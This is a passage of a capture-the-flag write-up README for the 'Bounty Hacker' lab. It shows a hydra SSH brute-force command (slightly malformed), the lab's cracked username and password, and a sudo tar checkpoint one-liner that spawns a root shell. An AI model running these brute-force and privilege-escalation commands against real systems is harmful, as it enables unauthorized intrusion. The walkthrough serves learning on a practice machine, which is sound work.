tom-who/Bounty-Hacker-CTF-/README.md

 To do this attack we must make a file containing the usernames, which for convenience sake we will call users.txt and then write our command

 `hydra -l users.txt -P locks.txt ssh://<machine_ip -V>`

+SUCCESS!!!
+Username: Lin
+Password: RedDr4gonSynd1cat3

+### Privelege Escalation

+`ssh lin@<machine_ip>`

+Logging on we see the first flag, which you can get yourself But we are not done, we need to get the root flag, which we dont have access to, we need to escalate our privelleges Using `sudo -l` we can see what we can run as sudo, which is tar, go to https://gtfobins.github.io/# and search up tar, I will let you do this on your own

+If you have found the right command it should be
+`sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh`

+Executing this gives us root permissions, meaning we have full control over the machine Change to /root and get the flag

+I hope this helps!!